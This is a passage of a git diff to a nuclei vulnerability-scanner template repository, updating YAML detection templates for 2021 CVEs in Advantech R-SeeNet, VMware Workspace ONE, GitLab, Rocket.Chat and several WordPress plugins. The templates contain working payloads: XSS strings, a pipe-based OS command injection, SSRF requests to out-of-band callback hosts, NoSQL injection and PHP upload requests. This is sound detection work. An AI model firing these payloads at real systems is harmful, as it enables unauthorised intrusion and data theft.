verified: "true" - tags: cve,cve2021,xss,r-seenet - -requests: - - method: GET - path: - - "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "SSH Session " - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-21801.yaml b/nuclei-templates/CVE-2021/CVE-2021-21801.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21801.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21801.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21802.yaml b/nuclei-templates/CVE-2021/CVE-2021-21802.yaml index 06e9b12621..28e27e9668 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21802.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21802.yaml @@ -1,15 +1,23 @@ id: CVE-2021-21802 + info: name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS) author: gy741 severity: medium description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 - tags: cve,cve2021,r-seenet,xss + tags: cve,cve2021,rseenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21802 + cwe-id: CWE-79 + requests: - method: GET path: - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22' + matchers-condition: and matchers: - type: word @@ -18,10 +26,12 @@ requests: - 'Device Status Graph' part: body condition: and + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21803.yaml b/nuclei-templates/CVE-2021/CVE-2021-21803.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21803.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21803.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21805.yaml b/nuclei-templates/CVE-2021/CVE-2021-21805.yaml index 3ed6b9fc39..46e88b33e8 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21805.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21805.yaml @@ -1,42 +1,27 @@ id: CVE-2021-21805 - info: - name: Advantech R-SeeNet 2.4.12 - OS Command Injection + name: Advantech R-SeeNet v 2.4.12 - OS Command Injection author: arafatansari severity: critical description: | - Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - impact: | - Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. - remediation: | - Update to the latest version of Advantech R-SeeNet to mitigate this vulnerability. + Advantech R-SeeNet v 2.4.12 is vulnerable to OS Command Injection in the ping.php script functionality. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 - https://nvd.nist.gov/vuln/detail/CVE-2021-21805 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21805 cwe-id: CWE-78 - epss-score: 0.97374 - epss-percentile: 0.99895 - cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: advantech - product: r-seenet shodan-query: http.html:"R-SeeNet" - tags: cve2021,cve,rce,r-seenet,advantech - -http: + verified: "true" + tags: cve,cve2021,rce,r-seenet +requests: - method: GET path: - "{{BaseURL}}/php/ping.php?hostname=|dir" - matchers-condition: and matchers: - type: word @@ -45,13 +30,10 @@ http: - "Ping |dir" - "bottom.php" condition: and - - type: word part: header words: - "text/html" - - type: status status: - 200 -# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-21816.yaml b/nuclei-templates/CVE-2021/CVE-2021-21816.yaml deleted file mode 100644 index 38a9e71a82..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21816.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2021-21816 -info: - name: D-Link DIR-3040 - Syslog Information Disclosure - author: gy741 - severity: medium - description: An information disclosure vulnerability exists in the Syslog functionality of D-Link DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N - cvss-score: 4.3 - cve-id: CVE-2021-21816 - cwe-id: CWE-922 - tags: cve,cve2021,dlink,exposure,router,syslog -requests: - - method: GET - path: - - "{{BaseURL}}/messages" - matchers-condition: and - matchers: - - type: word - words: - - "syslog:" - - "admin" - - "/etc_ro/lighttpd/www" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21975.yaml b/nuclei-templates/CVE-2021/CVE-2021-21975.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21975.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21975.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-22054.yaml b/nuclei-templates/CVE-2021/CVE-2021-22054.yaml index 0de7ce4ee8..1599beb9ec 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-22054.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-22054.yaml @@ -1,13 +1,13 @@ id: CVE-2021-22054 info: - name: VMWare Workspace One UEM SSRF + name: VMWare Workspace ONE UEM - Server-Side Request Forgery author: h1ei1 severity: high - description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. + description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. reference: - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-22054 - https://www.vmware.com/security/advisories/VMSA-2021-0029.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-22054 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -22,9 +22,11 @@ requests: - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A" matchers-condition: and matchers: + - type: word + words: + - "Interactsh Server" - type: status status: - 200 - - type: word - words: - - "Example Domain" + +# Enhanced by mp on 2022/06/27 diff --git a/nuclei-templates/CVE-2021/CVE-2021-22214.yaml b/nuclei-templates/CVE-2021/CVE-2021-22214.yaml deleted file mode 100644 index d374690bcd..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-22214.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2021-22214 -info: - author: Suman_Kar - name: Unauthenticated Gitlab SSRF - CI Lint API - severity: medium - description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited. - reference: | - - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - - https://docs.gitlab.com/ee/api/lint.html - tags: cve,cve2021,gitlab,ssrf,oob -requests: - - raw: - - | - POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 - Referer: {{BaseURL}} - content-type: application/json - Connection: close - - {"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"} - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2021/CVE-2021-22707.yaml b/nuclei-templates/CVE-2021/CVE-2021-22707.yaml index 408202e788..843d4a9253 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-22707.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-22707.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22707 cwe-id: CWE-798 - epss-score: 0.39636 - epss-percentile: 0.96894 + epss-score: 0.27092 + epss-percentile: 0.96671 cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: evlink_city_evc1s22p4_firmware shodan-query: title:"EVSE web interface" fofa-query: title="EVSE web interface" - tags: cve,cve2021,evlink,auth-bypass + tags: cve2021,cve,evlink,auth-bypass,schneider-electric http: - raw: @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066a9645324b156c9dd069e3a3a087fc69e0744524b96a5570f16e55c077b697b02210080b17fdace0414a4bceb62ee371881cf66e409c216c91c17d60c83c442fad546:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2ddc524c81bab04c11b51b6377bb61707042a4f1c9007e4d4fc8dd4b9c415ba022100df0afe79fce39ccb1592f7893da9933c9b1a645a95fa1e6be05a57e53c2b67aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-22911.yaml b/nuclei-templates/CVE-2021/CVE-2021-22911.yaml index fa55be1229..8ae52aa88f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-22911.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-22911.yaml @@ -5,6 +5,10 @@ info: author: tess,sullo severity: critical description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, leading to unauthorized access, data manipulation, or denial of service. + remediation: | + Upgrade Rocket.Chat to a version higher than 3.13 or apply the provided patch to mitigate the vulnerability. reference: - http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html - https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911 @@ -16,13 +20,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-22911 - cwe-id: CWE-89 + cwe-id: CWE-75,NVD-CWE-Other + epss-score: 0.94773 + epss-percentile: 0.99209 + cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: rocket.chat + product: rocket.chat shodan-query: http.title:"Rocket.Chat" - verified: "true" - tags: rocketchat,nosqli,packetstorm,vulhub,hackerone,cve,cve2021 + tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli -requests: +http: - raw: - |- POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1 @@ -48,5 +58,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/10/12 +# digest: 4a0a0047304502202ceec4399b237de979a8a362eb44fad120bd7bb964bb3fcdbb6d6a01e6557c52022100894d28662f6e764af7d0e5fca1e84474779041d8ac3df6fa020f407efa627421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24145.yaml b/nuclei-templates/CVE-2021/CVE-2021-24145.yaml index 379ae4801a..faae9c575d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24145.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24145.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution. + impact: | + Remote code execution remediation: Fixed in version 5.16.5. reference: - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610 @@ -17,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24145 cwe-id: CWE-434 - epss-score: 0.93725 - epss-percentile: 0.98894 + epss-score: 0.94936 + epss-percentile: 0.99118 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,10 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive + tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus + +variables: + string: "CVE-2021-24145" http: - raw: @@ -46,7 +51,7 @@ http: Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php" Content-Type: text/csv - + -----------------------------132370916641787807752589698875 Content-Disposition: form-data; name="mec-ix-action" @@ -59,10 +64,8 @@ http: matchers-condition: and matchers: - - type: dsl - dsl: - - contains(header_3, "text/html") - - status_code_3 == 200 - - contains(body_3, 'CVE-2021-24145') - condition: and -# digest: 4b0a00483046022100d63a9f610fac887aa79576d6d9c737ab89ba2dd43219f9605c5aecf00d58f879022100f112299483a18228eaf5e63b078bb7ed1074b1c0bd00aaf880b18d7782b2f3b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + part: body_3 + words: + - '{{md5(string)}}' +# digest: 4a0a00473045022100eb908dd55285a9d68012b0deb023c829756d657d18a89b83a500e349b9414fdc0220797b8bd8acbf0f11d56926e26306dcaaf73faad50e06780881b5dcea9c5251ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24150.yaml b/nuclei-templates/CVE-2021/CVE-2021-24150.yaml index b6f80444ac..af83e84061 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24150.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24150.yaml @@ -1,11 +1,15 @@ id: CVE-2021-24150 info: - name: Like Button Rating < 2.6.32 - Unauthenticated Full-Read SSRF + name: WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery author: theamanrawat severity: high description: | - The LikeBtn WordPress plugin was vulnerable to Unauthenticated Full-Read Server-Side Request Forgery (SSRF). + WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. + remediation: | + Update the WordPress Like Button Rating plugin to version 2.6.32 or later. reference: - https://wpscan.com/vulnerability/6bc6023f-a5e7-4665-896c-95afa5b638fb - https://wordpress.org/plugins/likebtn-like-button/ @@ -15,15 +19,22 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24150 cwe-id: CWE-918 + epss-score: 0.02268 + epss-percentile: 0.88473 + cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button + verified: true + max-request: 1 + vendor: likebtn-like-button_project + product: likebtn-like-button + framework: wordpress + tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project -requests: +http: - raw: - | @timeout: 10s - GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.interact.sh')}}" HTTP/1.1 + GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}" HTTP/1.1 Host: {{Hostname}} matchers-condition: and @@ -36,3 +47,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502200ae092b2adea843bbfc67e272e1bbcdda95f6b1ba06ecb35d0f8be5f3de1461b0221009750e56702e2ad63ef146d19101a646b2f66d94372d7809750db43ee23d5a703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24155.yaml b/nuclei-templates/CVE-2021/CVE-2021-24155.yaml index 52750a3368..244295f61e 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24155.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24155.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution. + impact: | + Remote code execution remediation: Fixed in version 1.6.0. reference: - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb @@ -17,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24155 cwe-id: CWE-434 - epss-score: 0.95369 - epss-percentile: 0.99171 + epss-score: 0.95488 + epss-percentile: 0.99234 cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: backup-guard product: backup_guard framework: wordpress - tags: authenticated,wp,packetstorm,wp-plugin,cve2021,rce,wordpress,cve,backup,wpscan,intrusive + tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard http: - raw: @@ -77,4 +79,4 @@ http: regex: - BG_BACKUP_STRINGS = {"nonce":"([0-9a-zA-Z]+)"}; internal: true -# digest: 4a0a00473045022100b061ce9bdab2853c68100723d19fc954a5fd56188a44816e8bfcbe57f63f6cc5022005b23d5f9b10ac34ee06b2bec16904eb42e917ced05c5959b241e6149f5ebf82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8c26489e388600ed7392126a0d96153b15b0ad02bfc879d7e47473dcb14fa9e022041508bc27c2a5f188b6cd39a606c2be97099960ee8d30c9ddb535a3a22f9a31c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24165.yaml b/nuclei-templates/CVE-2021/CVE-2021-24165.yaml index b80bf03591..cffac4b43f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24165.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24165.yaml @@ -6,18 +6,32 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Update to the latest version of the Ninja Forms plugin (3.4.34 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818 - https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24165 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24165 cwe-id: CWE-601 - tags: cve,cve2021,wordpress,redirect,wp-plugin,authenticated,wp,wpscan + epss-score: 0.00129 + epss-percentile: 0.46774 + cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: ninjaforms + product: ninja_forms + framework: wordpress + tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -27,19 +41,15 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1 Host: {{Hostname}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: - 'status_code_1 == 302' - 'status_code_2 == 302' - - "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')" + - "contains(header_2, 'Location: https://interact.sh?client_id=1')" condition: and - -# Enhanced by md on 2022/10/14 +# digest: 4a0a00473045022100af649c1abdb63fdedcc1e46e68a77c520ee591eac3e400bbaa84654855512c8902200eb0a2419a23469cfae750f62bd2f38b597658927a13e0dc3aabafb3c49025dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24169.yaml b/nuclei-templates/CVE-2021/CVE-2021-24169.yaml index 5f21e39583..c9b9181338 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24169.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24169.yaml @@ -6,19 +6,22 @@ info: severity: medium description: | WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Authenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise. remediation: Fixed in version 3.1.8. reference: - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3 - https://www.exploit-db.com/exploits/50324 - https://wordpress.org/plugins/woo-order-export-lite/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24169 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24169 cwe-id: CWE-79 - epss-score: 0.00183 - epss-percentile: 0.55492 + epss-score: 0.0021 + epss-percentile: 0.58287 cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: algolplus product: advanced_order_export framework: wordpress - tags: wordpress,authenticated,wpscan,cve,cve2021,xss,wp-plugin,wp,woo-order-export-lite,edb + tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus http: - raw: @@ -47,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "woo-order-export-lite")' condition: and -# digest: 4b0a004830460221008900c2bcb41afb7cb8760d8fc0b17d9d2737ac702767ca98b531dc6f0aeedeb5022100e48fda55a787c3275448413db005fa0c2561f4412ceebd41a63ce328c366add8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009d6516913d6729de70ed63ad691d2279e02dccb63785273ce41ad95627d09b600221008c2ad831a4ea154a285ac6cc8782e79d2963279dd7368f98298158f17ca2bedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24182.yaml b/nuclei-templates/CVE-2021/CVE-2021-24182.yaml index 81d5860713..5c0a727f61 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24182.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24182.yaml @@ -1,31 +1,46 @@ id: CVE-2021-24182 info: - name: Tutor LMS < 1.8.3 - SQL Injection via tutor_quiz_builder_get_answers_by_question - author: akincibor - severity: critical - description: The tutor_quiz_builder_get_answers_by_question AJAX action from the plugin was vulnerable to UNION based SQL injection that could be exploited by students. + name: > + Tutor LMS <=1.8.2 - SQL Injection via tutor_quiz_builder_get_answers_by_question + author: topscoder + severity: high + description: > + The tutor_quiz_builder_get_answers_by_question AJAX action from the Tutor LMS – eLearning and online course solution WordPress plugin before 1.8.3 was vulnerable to UNION based SQL injection that could be exploited by students. reference: - - https://wpscan.com/vulnerability/f74dfc52-46ba-41e3-994b-23115a22984f - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6489214-2155-47f4-83ef-0119b3c26e43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-24182 + metadata: + fofa-query: "wp-content/plugins/tutor/" + google-query: inurl:"/wp-content/plugins/tutor/" + shodan-query: 'vuln:CVE-2021-24182' + tags: cve,wordpress,wp-plugin,tutor,high -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - - '{{BaseURL}}/wp-content/plugins/tutor/readme.txt' + - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt" extractors: - type: regex name: version - internal: true + part: body group: 1 + internal: true regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" - type: regex + name: version + part: body group: 1 regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: @@ -35,9 +50,9 @@ requests: - type: word words: - - "Tutor LMS" + - "tutor" part: body - type: dsl dsl: - - compare_versions(version, '< 1.8.3') \ No newline at end of file + - compare_versions(version, '<= 1.8.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24214.yaml b/nuclei-templates/CVE-2021/CVE-2021-24214.yaml index cf5a0ecabd..4595b089bc 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24214.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24214.yaml @@ -1,23 +1,50 @@ id: CVE-2021-24214 + info: name: WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting author: tess severity: medium description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WordPress OpenID Connect Generic Client plugin (3.8.2) to fix this vulnerability. reference: - https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214 - https://nvd.nist.gov/vuln/detail/CVE-2021-24214 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24214 cwe-id: CWE-79 + epss-score: 0.00337 + epss-percentile: 0.7074 + cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: verified: true - tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,wp,openid + max-request: 1 + vendor: daggerhartlab + product: openid_connect_generic_client + framework: wordpress + tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'OpenID Connect Generic Client' -requests: - method: GET path: - '{{BaseURL}}/wp-login.php?login-error=' @@ -39,5 +66,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/09/19 +# digest: 490a0046304402206fc7f4432dfb77192a80cf4d997a216a19b49797038590bc872b29213ac7583702203b5e05a054ce8e225e79baf93062589c32a2ca5381d2dbe7b305083323a93600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24215.yaml b/nuclei-templates/CVE-2021/CVE-2021-24215.yaml index 28e78e21c9..663bb6f686 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24215.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24215.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24215 cwe-id: CWE-425,CWE-284 - epss-score: 0.07074 - epss-percentile: 0.93283 + epss-score: 0.19113 + epss-percentile: 0.9615 cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: product: controlled_admin_access framework: wordpress 